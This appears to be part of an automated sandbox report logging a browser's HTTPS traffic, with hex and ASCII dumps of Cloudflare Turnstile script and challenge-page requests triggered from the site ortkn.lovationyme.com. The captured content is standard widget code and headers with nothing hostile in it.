                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC1369INData Raw: 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d 29 2c 62 3d 44 28 62 2c 78 2c 53 2c 6d 2c 66 2c 32 31 2c 41 5b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]),b=D(b,x,S,m,f,21,A[


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              12192.168.2.449759104.18.94.414431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC383OUTGET /turnstile/v0/b/62ec4f065604/api.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC441INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 47460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              accept-ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              last-modified: Tue, 01 Oct 2024 14:19:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-RAY: 8cf87240acd75e7d-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC928INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 68 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 68 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 6e 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,l,h){try{var f=e[l](h),p=f.value}catch(s){n(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC1369INData Raw: 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ct.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function rt(e,r){return r=r!=null?r:{},Object.getOwnPropertyD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 55 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 5d 26 31 29 74 68 72 6f 77 20 6c 5b 31 5d 3b 72 65 74 75 72 6e 20 6c 5b 31 5d 7d 2c 74 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function U(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var n={label:0,sent:function(){if(l[0]&1)throw l[1];return l[1]},tr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC1369INData Raw: 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: oaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var Ue=300030;var Ve=300031;var q;(function(e){e.MANAGED="managed",
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC1369INData Raw: 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6f 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: al",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var oe;(function(e){e.EXECUTE="execute"})
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC1369INData Raw: 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: archParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.set("clearance_level",e.params.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC1369INData Raw: 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 68 3d 4c 28 4e 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 66 2c 70 3d 4c 28 6b 72 2c 28 66 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 66 21 3d 3d 76 6f 69 64 20 30 3f 66 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ===Se.FAILURE_HAVING_TROUBLES,l,h=L(Nr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),f,p=L(kr,(f=(n=e.displayLanguage)===null||n===void 0?void 0:n.toLowerCase())!==null&&f!==void 0?f:"nonexistent")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC1369INData Raw: 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 68 29 7b 76 61 72 20 66 3d 5b 6e 75 6c 6c 5d 3b 66 2e 70 75 73 68 2e 61 70 70 6c 79 28 66 2c 6c 29 3b 76 61 72 20 70 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 66 29 2c 73 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 68 26 26 4a 28 73 2c 68 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: uct:Ie=function(c,l,h){var f=[null];f.push.apply(f,l);var p=Function.bind.apply(c,f),s=new p;return h&&J(s,h.prototype),s},Ie.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Object.getPrototypeOf:function(n){return n.__proto__||Object
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC1369INData Raw: 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 56 28 72 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: flare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;if(V(r,HTMLScriptElement)&&e.test(r
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC1369INData Raw: 61 75 74 6f 22 2c 66 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 73 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: auto",f.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var s=document.createElement("div");s.className="cf-turnstile-feedback"


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              13192.168.2.449757104.18.95.414431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC804OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iyj2o/0x4AAAAAAAkfyuN_fqTRgfZH/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://ortkn.lovationyme.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC1369INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 164931
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              document-policy: js-profiling
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              origin-agent-cluster: ?1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              referrer-policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 66 38 37 32 34 30 63 65 64 61 31 39 63 62 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Server: cloudflareCF-RAY: 8cf87240ceda19cb-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC1317INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC1369INData Raw: 25 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: %;margin:0;overflow:hidden;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-web
